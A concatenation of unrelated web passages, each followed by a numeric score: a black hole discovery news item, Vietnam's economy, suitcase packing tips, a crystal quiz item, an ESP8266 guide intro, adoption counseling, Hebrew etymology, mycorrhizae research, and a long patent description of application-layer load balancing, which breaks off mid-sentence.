The peculiar movement of gas at the galactic centre could be the smoking gun that finally leads astronomers to the most elusive type of black hole - the middleweight. Black holes are pretty hard to find unless they're actively feeding (or colliding), since they don't emit any electromagnetic radiation (except perhaps for Hawking radiation, which, if it exists, we can't detect). That's because electromagnetic radiation can't achieve escape velocity from beyond the event horizon; thus black holes are invisible to our detection methods when they're not doing something noticeable. In other words, those black holes of unusual size? We're not sure they exist. "When I checked the ALMA data for the first time," astrophysicist Shunya Takekawa of the NAOJ told New Scientist, "I was really excited because the observed gas showed obvious orbital motions, which strongly suggest an invisible massive object lurking." Similar high-velocity compact clouds have been observed as a result of collisions between supernova clouds, but the object - called HCN–0.009–0.044 - shows neither the shape nor the expansion pattern associated with a collision of this type. But now they've done something new. Based on the shape and movement of the gas streams, the team was able to infer that the object has a mass equivalent of around 32,000 Suns. This makes it - if the paper passes peer review - a very strong contender for a black hole missing link, packing all that mass into an object roughly the size of Jupiter. As well as the motion of the gas, ionisation of the gas in the inner part of the orbit suggests that at some point, either photoionisation, dissociative shock, or both took place - ionisation processes seen in active black holes. "Our results provide new circumstantial evidences for a wandering intermediate-mass black hole in the Galactic centre, suggesting also that high-velocity compact clouds can be probes of quiescent black holes abound in our Galaxy," the researchers wrote in their paper. "[H]igh-resolution observations of compact high-velocity gas features have the potential to increase the number of candidates for non-luminous black holes, providing a new perspective to search for the missing black holes."
0.999948
The presentation slides look great. Are they supposed to be professional? I'm ready for my beer though. this presentation is great and professional.
0.995201
President Trump's visit to Vietnam in February highlighted what trade officials and shipping lines have known for years: The once war-torn nation of 97 million has become the world's latest trade export powerhouse. After recovering from the war with the US, which decimated the countryside and killed millions of people, Vietnamese leaders in the 1980s started implementing "Doi Moi", or reform, aimed at building a Chinese-style economy that would be socialist but oriented at fostering private companies. The government's initiative included reducing public subsidies, inviting foreign investment, and participating in more trade deals with richer economies around the world. In 1994, the US lifted its trade embargo on imports from its former adversary. In 2007, Vietnam formally joined the World Trade Organization. The result has been an economy that's been growing at over 6% a year and has been able to aggressively expand export markets around the world, especially to the US and China. Vietnam still faces plenty of hurdles, including lingering limits on foreign ownership, pressure from Beijing to align itself with China, and the danger of runaway inflation if it grows too fast. It also has a massive informal economy, largely unregulated and untaxed, which it would like to harness. It's also heavily dependent on imports from China. Vietnam is still ruled by the Communist Party but in this century it's attempted to cut back on the number of firms run solely by the state. Private companies now account for almost half of the Vietnamese economy. Now it faces questions over how it will steer its economy. Will it, like China, build manufacturing zones and become one of the world's factories? Or will it strive to build an economy based on tech, banking, and other services? Although Vietnam's relationship with China has sometimes been rocky, there is no doubting the importance of Chinese manufacturers investing in the country. Chinese companies have invested heavily in building manufacturing capacity in the country, to take advantage of lower wages in Vietnam, and partly to avoid tariffs imposed by the US and Europe on goods made in China. A key question for Vietnam is how it will be impacted by the tension over trade between the US and China. Japan, South Korea, Singapore, and China are all big investors. Companies like Samsung and Intel have plants in Vietnam. Both China and the US are vying for closer relationships with Vietnam. In February, during Trump's visit, Vietnamese aviation firms agreed to purchase over $20 billion of aircraft parts and services from Boeing and General Electric. In addition, Vietnam is ramping up exports of agricultural products, especially rice, coffee, and shrimp. After suffering from excessive inflation in the 1980s, Vietnam has embraced an economic policy of moderate growth. Policymakers have also worked to diversify the Vietnamese economy, stimulating investment in its food sector, leather industry, and plastics manufacturing. In building on its prosperity and charting a new economic path while asserting its independence from China, Vietnam still has some trump cards it can play. The government has hundreds of state-owned companies it's looking to privatize. When it does that, it will unlock further value and economic growth as it has a strong stock market. Inflation is low and its currency stable, and the wages are lower than in China. The population is remarkably young, with two-thirds of Vietnamese are under 35.
0.984186
Would you love to know how to packa suitcase in 30 minutes? Preparing for a trip and realize you have no time to pack your suitcase? No worries! You can pack your stuff a lot faster than you may realize or know. Although packing can take a lot of time, there are some great tips and tricks to shorten the preparation for your travels down to 30 minutes or even less. Today I’m sharing with you some tips and steps for how to pack your suitcase in 30 minutes. When you’re packing your suitcase you need to know what size suitcase will work best for your needs and for carrying with you. It’s better to have a slightly larger suitcase for what you may need rather than a too small suitcase. Even if you’re not planning on a trip, it’s helpful to have some bathroom supplies prepared for when you need to pack ahead of time like a small bag with mini shampoo and conditioner containers, some toothpaste, etc. so you’re ready when you do need it. In order to pack well and use your space to the fullest, you should lay everything out in front of you. This way you can see what you have to fit into your suitcase and how you can make the most of your space. In order to keep things organized and safe, cover more fragile items with softer items that can protect your items from being harmed. You can also use this in keeping your suitcase organized, maybe layering each type of supply or each day’s outfit in order. To again keep things together and organized, put your blanket or towel that you’re bringing over the top of everything else and tuck it into the edges. It can help to keep rolling items still and make it easier to close your suitcase without catches. Overpacking can make your suitcase a lot more difficult to prepare, making your time taken much longer. Only pack your essentials of things and remember to be minimal with what you bring for extras like accessories or electronics. If you’re flying it’s important to know what rules and regulations you have to follow before packing and while packing so you don’t have a hassle later on. For example things like your liquid containers being regulation size and things like that. When packing you want to know the climate of your destination and what you’ll need for the type of trip, make sure to pack clothes that are appropriate for your specific needs as well as shoes that are also workable. If you were having trouble knowing how to pack quickly and be ready more efficiently, hopefully, the tips and steps above have helped you. This can help with making your packing ahead of time easier and can make you not miss any deadlines if you are running last minute. Good luck with your preparations! Let me know in the comments if these helped you pack a suitcase faster for your travels.
0.992261
The shape of a crystal is dependent on which of the following? A. the boiling point of the solid. B. the internal vapor pressure of the solid. C. the arrangement of the particles in the solid. D. the pressure of the particles within the solid. E. the ambient temperature where the solid forms. Correct Answer: C. the arrangement of the particles in the solid. The shape of a crystal is dependent on the arrangement/layout of the particles in the solid. The unit cell is the smallest repeating unit of a crystal that retains the crystals shape. The unit cell can either be simple cubic, body-centered, or face-centered.
0.999997
Some time ago, I wrote a Beginner's Guide to Arduino that seems to be very popular, so I decided to create a follow-up: A Beginner's Guide to the ESP8266. That's right, a tutorial on how to use the world's most popular $3 Wi-Fi board. This is going to be a very in-depth tutorial, covering some networking concepts as well. If you're a beginner, and just want to go straight to the more exciting Wi-Fi part, feel free to do so, I included short TL;DR's in the longer, more technical parts. Setting up a Wi-Fi connection: That's probably why you're reading this, right? This guide expects some basic knowledge of microcontrollers like the Arduino. If that's something you're not already familiar with, I'd recommend you to read my Beginner's Guide to Arduino first, it covers a lot of the basics that I won't go into in this article. The ESP8266 is a System on a Chip (SoC), manufactured by the Chinese company Espressif. It consists of a Tensilica L106 32-bit micro controller unit (MCU) and a Wi-Fi transceiver. It has 11 GPIO pins* (General Purpose Input/Output pins), and an analog input as well. This means that you can program it like any normal Arduino or other microcontroller. And on top of that, you get Wi-Fi communication, so you can use it to connect to your Wi-Fi network, connect to the Internet, host a web server with real web pages, let your smartphone connect to it, etc ... The possibilities are endless! It's no wonder that this chip has become the most popular IOT device available. There are many different modules available, standalone modules like the ESP-## series by AI Thinker, or complete development boards like the NodeMCU DevKit or the WeMos D1. Different boards may have different pins broken out, have different Wi-Fi antennas, or a different amount of flash memory on board. (*) The ESP8266 chip itself has 17 GPIO pins, but 6 of these pins (6-11) are used for communication with the on-board flash memory chip. There are different ways to program the ESP8266, but I'll only cover the method using the Arduino IDE. This is really easy for beginners, and it's a very familiar environment if you've used Arduino boards before. Just keep in mind that it's not limited to this option: there's also an official SDK available to program it in real C, this is very useful if you want to optimize your code or do some advanced tricks that aren't supported by the Arduino IDE. Another possibility is to flash it with a LUA interpreter, so you can upload and run LUA scripts. Or maybe you're more familiar with Python? Then you should check out the MicroPython firmware to interpret MicroPython scripts. I'm sure there's other languages available as well, so just do a quick Google search and write your code in the language of your choice. (*) Your board may already include these. More information can be found in the next chapter.
0.999977
Adoptive parents and adoption professionals should have as much interest and concern about the emotional and psychological health of the birthmother as they do about her physical health. A birthmother involved in making an adoption plan for her baby will typically experience a gamut of phases that might take her by great surprise. A birthmother should be professionally advised that it is normal to experience grief, denial, anger, uncertainty, confusion, guilt, and depression. She should have professional resources available to her to discuss these phases and learn how to accept them and resolve the issues. Otherwise, she might one day feel like she has walked into a brick wall of unexplainable emotions. Not knowing how to respond, she might lash out at the adoptive parents, and might even terminate the adoption plan. I know this from personal experience with my son's birthmother. In the course of counseling, other issues might be discovered and hopefully resolved early in the adoption plan. Professional adoption counseling will assist the birthmother in determining if indeed adoption is the right choice for her and her baby. If it is the right choice, counseling will help her to staying focused on her decision before and after the birth. If adoption is not the right choice, it is much better for the birthmother, the adoptive parents, and especially for the child, if that is determined before the birth rather than after the adoptive parents have physical custody of the child. Professional adoption counseling can minimize risk for everyone involved in the process! To serve the best interest of everyone, do and say all that you can to encourage a birthmother to engage in professional adoption counseling, before and after the birth. Professional adoption counseling can also greatly benefit an involved birthfather and birth-grandparents as well. These individuals may also experience the same gamut of emotions the birthmother might face. Counseling will benefit them in same way it does the birthmother. Additionally, they may have a significant amount of influence on the birthmother and hopefully will be prepared to support her in her decision. They can be better prepared to offer her the support she needs if they understand the basis of her decision and they, themselves, accept it and learn how to manage their emotions such as, and grief, confusion, and anger. Likewise, adoptive parents would also benefit from professional adoption counseling. Adoptive parents must be knowledgeable about what a birthmother might experience psychologically, so that they can recognize these phases and be supportive rather than frightened and defensive. Additionally, adoptive parents will likely experience changes in their relationship while the adoption plan in is effect and they await the birth of their child. The stress level can be incredible. Couples who rarely argue may find that they are now doing so; there may be anxiety and uncertainty. As they ponder how their lives are about to change dramatically, it's no wonder! A counselor can educate adoptive parents on these issues and more, and assist them to arrive at resolution. Not all counselors, regardless of their degrees, are trained to provide adoption counseling, which is very specific and unique. When selecting an adoption counselor, it would be wise to get referrals and references from adoption professionals or other adoptive parents. Excerpted from Chapter Seven, "The Adoption Connection"
0.910045
I live in a community that has an active local email list, and people are often looking for rides from one place to another. It always looks to me as very strange when someone writes: "I'm going to Jerusalem and I need a tramp". Of course they mean that they're looking for a ride, but to my (American) ears it sounds like they're looking for a vagrant, or even a promiscuous woman. 1388, "walk heavily, stamp," from M.L.G. trampen "to stamp," from P.Gmc. *tramp- (cf. Dan. trampe, Swed. trampa "to tramp, stamp," Goth. ana-trimpan "to press upon"), probably from a variant of the P.Gmc. source of trap. The noun meaning "person who wanders about, vagabond" is first recorded 1664, from the verb. Sense of "steamship which takes cargo wherever it can be traded" (as opposed to one running a regular line) is attested from c.1880. The meaning "promiscuous woman" is from 1922. 1798, from Sp. trampolin "springboard," and It. trampolino, from trampoli "stilts," from a Gmc. source (cf. Low Ger. trampeln "trample") related to tramp. Why did Hebrew move from "tramp" to "tremp"? It turns out it's part of a wider trend. "I did want to point out that there is a third possible treatment of [ae]: it can become a mid vowel [e] (or epsilon). This is what happens in Hebrew. a brand of catfood called "ketli"
0.896495
Can colonization by arbuscular mycorrhizae facilitate co-existence among plant species? Fungi known as arbuscular mycorrhizae form symbiotic relationships with about 73% of all vascular plant species. In this relationship, the mycorrhizae facilitate uptake of nutrients into plant roots in exchange for sugars produced by the plant via photosynthesis. Although mycorrhizal symbiosis has been shown to increase the species diversity of plant communities, individual plant species differ in the extent to which they benefit from the relationship. Since plants within a community interact and compete with one another for limited resources (soil nutrients, light, water), Stanescu and Maherali (2017) were interested in exploring how arbuscular mycorrhizae may influence this competition and possibly reduce it. In other words, could mycorrhizal symbiosis facilitate coexistence between species that are efficient at taking up resources (strong competitor) with those that are poorer at resource uptake (weak competitor)? This facilitation could spare weak competitors from being excluded from a community via competition and thereby allow for greater species diversity. For their study, Stanescu and Maherali (2017) used 21 plant species commonly found in old fields of Southern Ontario. Seeds were collected from the Long-Term Mycorrhizal Research Site at the U of G’s Arboretum, a successional old field that was last cultivated in the late 1960s, or purchased if unavailable. Plants were grown in the greenhouse at the University of Guelph’s Phytotron and quantitative measures of competitive ability as well as plant growth when roots were either colonized or uncolonized by mycorrhizae, were obtained. According to the results of the study, the answer to the above question of whether arbuscular mycorrhizae could facilitate coexistence between species of different competitive abilities is ‘yes’. In the presence of mycorrhizae, growth was generally positive for the 21 species tested while the variance in their competitive abilities was decreased by 73%. Stanescu and Maherali (2017) suggest that the “competitive hierarchy” among the plant species becomes compressed and could be a mechanism by which arbuscular mycorrhizae increase species diversity in plant communities. Stanescu S, Maherali H. 2017. Arbuscular mycorrhizal fungi alter the competitive hierarchy among old-field plant species. Oecologia. 183:479-491.
0.983007
The present invention generally relates to network elements in computer networks. The invention relates more specifically to a method and apparatus for balancing data traffic loads among a plurality of servers based on application layer messages contained in the data traffic. In a business-to-business environment, applications executing on computers commonly communicate with other applications that execute on other computers. For example, an application "A" executing on a computer "X" might send, to an application "B" executing on a computer "Y," a message that indicates the substance of a purchase order. Computer "X" might be remote from computer "Y." In order for computer "X" to send the message to computer "Y," computer "X" might send the message through a computer network such as a local area network (LAN), a wide-area network (WAN), or an inter-network such as the Internet. In order to transmit the message through such a network, computer "X" might use a suite of communication protocols. For example, computer "X" might use a network layer protocol such as Internet Protocol (IP) in conjunction with a transport layer protocol such as Transport Control Protocol (TCP) to transmit the message. Assuming that the message is transmitted using TCP, the message is encapsulated into one or more data packets; separate portions of the same message may be sent in separate packets. Continuing the above example, computer "X" sends the data packets through the network toward computer "Y." One or more network elements intermediate to computer "X" and computer "Y" may receive the packets, determine a next "hop" for the packets, and send the packets towards computer "Y." For example, a router "U" might receive the packets from computer "X" and determine, based on the packets being destined for computer "Y," that the packets should be forwarded to another router "V" (the next "hop" on the route). Router "V" might receive the packets from router "U" and send the packets on to computer "Y." At computer "Y," the contents of the packets may be extracted and reassembled to form the original message, which may be provided to application "B." Applications "A" and "B" may remain oblivious to the fact that the packets were routed through routers "U" and "V." Indeed, separate packets may take different routes through the network. A message may be transmitted using any of several application layer protocols in conjunction with the network layer and transport layer protocols discussed above. For example, application "A" may specify that computer "X" is to send a message using Hypertext Transfer Protocol (HTTP). Accordingly, computer "X" may add HTTP-specific headers to the front of the message before encapsulating the message into TCP packets as described above. If application "B" is configured to receive messages according to HTTP, then computer "Y" may use the HTTP-specific headers to handle the message. In addition to all of the above, a message may be structured according to any of several message formats. A message format generally indicates the structure of a message. For example, if a purchase order comprises an address and a delivery date, the address and delivery date may be distinguished from each other within the message using message format-specific mechanisms. For example, application "A" may indicate the structure of a purchase order using Extensible Markup Language (XML). Using XML as the message format, the address might be enclosed within "<address>" and "</address>" tags, and the delivery date might be enclosed within "<delivery-date>" and "</delivery-date>" tags. If application "B" is configured to interpret messages in XML, then application "B" may use the tags in order to determine which part of the message contains the address and which part of the message contains the delivery date. A web browser ("client") might access content that is stored on remote server by sending a request to the remote server's Universal Resource Locator (URL) and receiving the content in response. Web sites associated with very popular URLs receive an extremely large volume of such requests from separate clients. In order to handle such a large volume of requests, these web sites sometimes make use of a proxy device that initially receives requests and distributes the requests, according to some scheme, among multiple servers. One such scheme attempts to distribute requests relatively evenly among servers that are connected to the proxy device. A proxy device employing this scheme is commonly called a "load balancer." When successful, a load balancer helps to ensure that no single server in a server "farm" becomes inundated with requests. When a proxy device receives a request from a client, the proxy device determines to which server, of many servers, the request should be directed. For example, a request might be associated with a session that is associated with a particular server. In that case, the proxy device might need to send the request to the particular server with which the session is associated. Unfortunately, current load balancing approaches sometimes do not succeed in balancing loads among servers. For example, even if requests are distributed among servers relatively evenly, some servers might not have the processing capacity that other servers have. Additionally, some requests might require more processing than other requests. If a slower or less powerful server happens to receive requests that require a higher than average amount of processing, then that server may become overwhelmed, even if that server receives about the same quantity of requests as other servers in the "farm." The amount of time that clients are required to wait for responses to requests that are distributed to that server (the "response time") may become unduly and unacceptably long. US 2002/194342 discloses a content-aware application switch that intelligently switches client packets to one server among a group of servers in a server farm. The switch uses Layer 7 or application content parsed from a packet to help select the server and to schedule the transmitting of the packet to the server. This enables refined load-balancing and Quality-of-Service control tailored to the application being switched. Thus, previous approaches to load balancing sometimes fail to minimize response time. A more reliable technique for balancing data traffic among servers, to reduce response time, is needed. FIG. 24 is a diagram that illustrates an AONS monitoring architecture. A method as in claim 1 and apparatus as in claim 8 for balancing data traffic loads among a plurality of servers based on application layer messages contained in the data traffic is described. In the following description, for the purposes of explanation, numerous specific details are set forth in order to provide a thorough understanding of the present invention. It will be apparent, however, to one skilled in the art that the present invention may be practiced without these specific details. In other instances, well-known structures and devices are shown in block diagram form in order to avoid unnecessarily obscuring the present invention. The needs identified in the foregoing Background, and other needs and objects that will become apparent for the following description, are achieved in the present invention, which comprises, in one aspect, a method for application layer message-based load balancing. According to one embodiment, when a network element, such as a router, receives one or more data packets that collectively contain an application layer message, the network element determines a message classification to which the application layer message belongs. Using a session identifier location technique that is mapped to the message classification, the network element determines a session identifier that is contained within the application layer message. If the session identifier is already mapped to a server, then the network element sends the application layer message towards the server to which the session identifier is mapped. The session identifier can be obtained even from non-HTTP messages. Thus, session management may be conducted even for non-HTTP message traffic. Alternatively, if the session identifier is not already mapped to a server, then, using a load-balancing algorithm that is mapped to the message classification, the network element selects a server from among a plurality of servers, and maps the session identifier to the selected server. Different message classifications may be mapped to different load-balancing algorithms. The network element sends the application layer message towards the selected server. From among a set of servers from which the network element might select the server, the network element determines a subset of servers for which there are no outstanding requests. If there is at least one server in this subset, then the network element determines which of the servers in the subset has the lowest average historical response time, and selects that server. Alternatively, if the subset is empty (i.e., at least one outstanding request has been sent to each of the servers in the set), then, for each server in the set, the network element averages the wait times of the outstanding requests that the network element sent to that server. Thus, the network element determines each server's "average outstanding request wait time." The network element determines which of the servers in the set has the lowest average outstanding request wait time, and selects that server. Because requests may be distributed among servers based on average historical response times and average outstanding request wait times, requests are less likely to be sent to servers that are highly loaded or less capable, regardless of which server least recently received a request. As a result, data traffic is balanced more reliably among servers, decreasing the amounts of time that client applications need to wait for responses to those client applications' requests. Additionally, because different load balancing techniques may be assigned to different message classifications, different types of message traffic may be distributed among a plurality of servers in different ways. In other aspects, the invention encompasses a computer apparatus and a computer-readable medium configured to carry out the foregoing steps. FIG. 1 is a block diagram that illustrates an overview of one embodiment of a system 100 in which one or more of network elements 102, 104, 106, and 108 perform application layer message-based load balancing. Network elements 102, 104, 106, and 108 may be proxy devices and/or network switches and/or routers, such as router 600 depicted in FIG. 6 below, for example. Client application 110 is coupled communicatively with network element 102. Server applications 112A-N are coupled communicatively to network element 106. Server applications 114A-N are coupled communicatively to network element 108. Client application 110 and server applications 112A-N and 114A-N may be separate processes executing on separate computers. Network elements 102 and 104 are coupled communicatively with a network 116. Network elements 104 and 106 are coupled communicatively with a network 118. Network elements 104 and 108 are coupled communicatively with a network 120. Each of networks 116, 118, and 120 is a computer network, such as, for example, a local area network (LAN), wide area network (WAN), or internetwork such as the Internet. Networks 116, 118, and 120 may contain additional network elements such as routers. Client application 110 encapsulates application layer messages within data packets and addresses the data packets to virtual addresses, such as virtual IP addresses, each of which may be associated with multiple servers. For example, a first virtual IP address may be associated with server applications 112A-N, and a second virtual IP address may be associated with server applications 114A-N. Network elements that intercept data packets destined for the first virtual IP address route the data packets toward network element 106. Network elements that intercept data packets destined for the second virtual IP address route the data packets toward network element 108. Network elements 102, 104, 106, and 108 intercept the data packets that contain the messages. Network elements 102, 104, 106, and 108 assemble one or more data packets to determine at least a portion of an application layer message contained therein. Based on the message, network elements 102, 104, 106, and 108 perform one or more actions. The actions may include a "load balancing" action. Examples of some of these actions are described in further detail below. FIG. 2A depicts a flow diagram 200A that illustrates an overview of one embodiment of a method of balancing data traffic loads based on application layer message content. Such a method may be performed, for example, by any of network elements 102, 104, 106, and 108. Referring to FIG. 2A, in block 202, a first association is established, at a network element, between a first set of criteria and a first load-balancing algorithm. The first set of criteria includes criteria that an application message needs to satisfy in order to belong to a first message classification, to which the first load-balancing algorithm is mapped. The first message classification and the associated first set of criteria may be user-specified using management console 122, for example. For example, a mapping between a "purchase order" message classification and a first load-balancing algorithm may be established at network element 106. The first load-balancing algorithm might be a round-robin load-balancing algorithm, a weighted round-robin load-balancing algorithm, or an adaptive load-balancing algorithm such as is described in greater detail below, for example. Criteria associated with the "purchase order" message classification might indicate that only messages that contain a specified path in an XML hierarchy are to be classified as "purchase order" messages. In block 204, a second association is established, at the network element, between a second set of criteria and a second load-balancing algorithm that differs from the first load-balancing algorithm. The second set of criteria includes criteria that an application message needs to satisfy in order to belong to a second message classification, to which the second load-balancing algorithm is mapped. The second message classification and the associated second set of criteria may be user-specified using management console 122, for example. For example, a mapping between an "account transaction" message classification and a second load-balancing algorithm may be established at network element 106. Criteria associated with the "account transaction" message classification might indicate that only messages that contain a specified path in an XML hierarchy are to be classified as "account transaction" messages. In block 206, one or more data packets are received at the network element. For example, network element 106 may receive multiple TCP data packets that collectively contain, in the payload portions of those data packets, an application layer message that client application 110 addressed to a virtual IP address that is associated with server applications 112A-N. The application layer message might be an XML-formatted message, for example. In block 208, it is determined whether the application layer message satisfies all criteria in the first set of criteria. For example, network element 106 may determine whether the XML hierarchy of the message contains a specified path that is associated with the first message classification. If the application layer message satisfies all criteria in the first set of criteria, then control passes to block 210. Otherwise, control passes to block 212. In block 210, a server is selected, based on the first load-balancing algorithm, from among a plurality of servers. For example, network element 106 may use the first load-balancing algorithm to select, from among server applications 112A-N, a particular server application to which the application layer message will be directed. Network element 106 might select server application 112A as a result of applying the first load-balancing algorithm, for example. Control passes to block 218. Alternatively, in block 212, it is determined whether the application layer message satisfies all criteria in the second set of criteria. For example, network element 106 may determine whether the XML hierarchy of the message contains a specified path that is associated with the second message classification. If the application layer message satisfies all criteria in the second set of criteria, then control passes to block 214. Otherwise, control passes to block 216. In block 214, a server is selected, based on the second load-balancing algorithm, from among the plurality of servers. For example, network element 106 may use the second load-balancing algorithm to select, from among server applications 112A-N, a particular server application to which the application layer message will be directed. Network element 106 might select server application 112B as a result of applying the second load-balancing algorithm, for example. Control passes to block 218. Alternatively, in block 216, a server is selected, based on a load-balancing algorithm, from among the plurality of servers. For example, network element 106 may use a load-balancing algorithm that is associated with the message's classification to select, from among server applications 112A-N, a particular server application to which the application layer message will be directed. Control passes to block 218. In block 218, the message is sent toward the selected server. For example, assuming that network element 106 selected server application 112A, network element 106 may route the message to server application 112A. Network element 106 may encapsulate the message within one or more data packets to facilitate transmitting the message. As discussed above, one of several load-balancing algorithms that may be associated with a message classification is an "adaptive" load-balancing algorithm. FIG. 2B depicts a flow diagram 200B that illustrates an overview of one embodiment of a method of selecting a server based on an adaptive load-balancing algorithm. Referring to FIG. 2B, in block 220, from among a set of servers, a subset of servers that are not associated with any outstanding requests is determined. For example, assuming that network element 106 sent a request to server application 112A over a particular TCP connection, and that network element 106 has not yet received a corresponding response over the particular TCP connection, network element 106 does not select server application 112A to be in the subset. However, assuming that network element 106 has received responses corresponding to all requests that network element 106 has sent to server applications 112B-N, network element 106 includes server applications 112B-N in the subset of servers that have no outstanding requests. The subset may include those of server applications 112A-N to which network element 106 has not yet sent any request. In block 222, it is determined whether the subset is empty. For example, network element 106 may make this determination. If the subset is empty (i.e., all of server applications 112A-N are associated with one or more outstanding requests), then control passes to block 228. Alternatively, if there is at least one server in the subset, then control passes to block 224. In block 224, a separate average historical response time is determined for each server in the subset. For example, assuming that the subset contains server applications 112A and 112B, network element 106 may determine a first average historical response time for server application 112A, and a second average historical response time for server application 112B. The "response time" for a particular request is the amount of time that passed between (a) the time that the network element sent the particular request toward a server, and (b) the time that the network element received a response that corresponds to the particular request. Network element 106 may record a separate response time for each request for which network element 106 received a response from any of server applications 112A-N. The "average historical response time" for a particular server is determined by averaging all of the response times for requests that the network element sent to the particular server. For example, assuming that network element 106 received a first response from server application 112A three milliseconds after sending a corresponding first request toward server application 112A, and that network element 106 received a second response from server application 112A five milliseconds after sending a corresponding second request toward server application 112A, and that the first and second responses are the only responses that network element 106 received from server application 112A, network element 106 determines the "average historical response time" for server application 112A to be four milliseconds. In block 226, from among the servers in the subset, the server associated with the lowest average historical response time is selected. For example, if server application 112A is associated with an average historical response time of four milliseconds, and server application 112B is associated with an average historical response time of six milliseconds, then network element 106 selects server application 112A to receive the application layer message. Alternatively, in block 228, a separate average current outstanding request wait time is determined for each server in the set. For example, network element 106 may determine a separate average current outstanding request wait time for each of server applications 112A-N. An "outstanding request" is a request that the network element has sent toward a server, but for which the network element has not yet received a corresponding response from the server; the outstanding request is waiting to be processed by the server. The "wait time" for an outstanding request is the amount of time that passed since the time that the network element sent the outstanding request toward a server. For each request that network element 106 sends toward a server, network element 106 may record the time at which the request was sent, and delete the time when a corresponding response is received for the request-when the request is no longer outstanding. The "average current outstanding request wait time" for a particular server is determined by averaging all of the wait times for all of the current outstanding requests that were sent to the particular server. In block 230, from among the servers in the set, the server associated with the lowest average current outstanding request wait time is selected. For example, if server application 112N is associated with an average current outstanding request wait time of four milliseconds, and the rest of the server applications are associated with an average current outstanding request wait times greater than four milliseconds, then network element 106 selects server application 112N to receive the application layer message. As discussed above, before a server is selected based on a specified load-balancing algorithm, a network element may determine, based on the content of an application layer message, whether the message is associated with a session that determines to which server the message should be sent. FIG. 2C depicts a flow diagram 200C that illustrates an overview of one embodiment of an application layer message content-based session management method. Referring to FIG. 2C, in block 232, one or more data packets are received at a network element. For example, network element 106 may receive multiple TCP data packets that collectively contain, in the payload portions of those data packets, an application layer message that client application 110 addressed to a virtual IP address that is associated with server applications 112A-N. The application layer message might be an XML-formatted message, for example. The application layer message may contain a session identifier that client application 110 placed within the message according to a specified technique that is associated with the message's classification. In block 234, an application layer message is determined from payload portions of the data packets. For example, network element 106 may assemble the payload portions of multiple TCP data packets in order to construct the application layer message contained therein. The message does not need to be an HTTP-based message. The message may be a File Transfer Protocol (FTP)-based message or a Simple Mail Transfer Protocol (SMTP)-based message, for example. The message may be based on a proprietary protocol that does not contain built-in support for session management. In block 236, a message classification to which the application layer message belongs is determined. For example, network element 106 may determine that, because the application layer message satisfies specified criteria that are associated with a particular message classification, the application layer message belongs to the message classification. If the application layer message contains a specified path in an XML hierarchy, for example, the message might be classified as a "purchase order" message. In block 238, a session identifier is determined from the application layer message using a session identifier locating technique that is associated with the message classification. For example, if the message is a "purchase order" message, then network element 106 may invoke a specified session identifier locating process that is mapped to the "purchase order" message classification. The invoked process may find a specified path within an XML hierarchy of the message, and take the value of an XML element at that path to be the session identifier. This is only one example of a session identifier locating technique. Other techniques may find session identifiers based on specified character locations in a message (e.g., the session identifier is expected to be located immediately after the Nth character in the message), or based on regular expression-matching approaches, or using other techniques. In block 240, the message is sent toward a server that is mapped to the session identifier. For example, assuming that the session identifier is "2" and that network element 106 has established a mapping between session identifier "2" and server application 112B, network element 106 may route the message to server application 112B. Network element 106 may encapsulate the message within one or more data packets to facilitate transmitting the message. Thus, session management can be performed even when non-HTTP-based messages are used to communicate information between client and server applications. According to one embodiment, an Application-Oriented Network Services (AONS) blade in a router performs the actions discussed above. FIG. 6 is a block diagram that illustrates one embodiment of a router 600 in which a supervisor blade 602 directs some of packet flows 610A-B to an AONS blade and/or other blades 606N. Router 600 comprises supervisor blade 602, AONS blade 604, and other blades 606A-N. Each of blades 602, 604, and 606A-N is a single circuit board populated with components such as processors, memory, and network connections that are usually found on multiple boards. Blades 602, 604, and 606A-N are designed to be addable to and removable from router 600. The functionality of router 600 is determined by the functionality of the blades therein. Adding blades to router 600 can augment the functionality of router 600, but router 600 can provide a lesser degree of functionality with fewer blades at a lesser cost if desired. One of more of the blades may be optional. Router 600 receives packet flows such as packet flows 610A-B. More specifically, packet flows 610A-B received by router 600 are received by supervisor blade 602. Supervisor blade 602 may comprise a forwarding engine and/or a route processor such as those commercially available from Cisco Systems, Inc. In one embodiment, supervisor blade 602 classifies packet flows 610A-B based on one or more parameters contained in the packet headers of those packet flows. If the parameters contained in the packet header of a particular packet match specified parameters, then supervisor blade 602 sends the packets to a specified one of AONS blade 604 and/or other blades 606A-N. Alternatively, if the parameters contained in the packet header do not match any specified parameters, then supervisor blade 602 performs routing functions relative to the particular packet and forwards the particular packet on toward the particular packet's destination. For example, supervisor blade 602 may determine that packet headers in packet flow 610B match specified parameters. Consequently, supervisor blade 602 may send packets in packet flow 610B to AONS blade 604. Supervisor blade 602 may receive packets back from AONS blade 604 and/or other blades 606A-N and send the packets on to the next hop in a network path that leads to those packets' destination. For another example, supervisor blade 602 may determine that packet headers in packet flow 610A do not match any specified parameters. Consequently, without sending any packets in packet flow 610A to AONS blade 604 or other blades 606A-N, supervisor blade 602 may send packets in packet flow 610A on to the next hop in a network path that leads to those packets' destination. AONS blade 604 and other blades 606A-N receive packets from supervisor blade 602, perform operations relative to the packets, and return the packets to supervisor blade 602. Supervisor blade 602 may send packets to and receive packets from multiple blades before sending those packets out of router 600. For example, supervisor blade 602 may send a particular group of packets to other blade 606A. Other blade 606A may perform firewall functions relative to the packets and send the packets back to supervisor blade 602. Supervisor blade 602 may receive the packet from other blade 606A and send the packets to AONS blade 604. AONS blade 604 may perform one or more message payload-based operations relative to the packets and send the packets back to supervisor blade 602. According to one embodiment, the following events occur at an AONS router such as router 600. First, packets, containing messages from clients to servers, are received. Next, access control list-based filtering is performed on the packets and some of the packets are sent to an AONS blade or module. Next, TCP termination is performed on the packets. Next, Secure Sockets Layer (SSL) termination is performed on the packets if necessary. Next, Universal Resource Locator (URL)-based filtering is performed on the packets. Next, message header-based and message content-based filtering is performed on the packets. Next, the messages contained in the packets are classified into AONS message types. Next, a policy flow that corresponds to the AONS message type is selected. Next, the selected policy flow is executed. Then the packets are either forwarded, redirected, dropped, copied, or fanned-out as specified by the selected policy flow. FIGS. 3A-B depict a flow diagram 300 that illustrates one embodiment of a method of balancing data traffic among multiple servers based on application layer message content. For example, one or more of network elements 102, 104, 106, and 108 may perform such a method. More specifically, AONS blade 604 may perform one or more steps of such a method. Other embodiments may omit one or more of the operations depicted in flow diagram 300. Other embodiments may contain operations additional to the operation depicted in flow diagram 300. Other embodiments may perform the operations depicted in flow diagram 300 in an order that differs from the order depicted in flow diagram 300. Referring first to FIG. 3A, in block 302, user-specified input is received at a network element. The user-specified input indicates the following: one or more criteria that are to be associated with a particular message classification, and one or more actions that are to be associated with the particular message classification. The 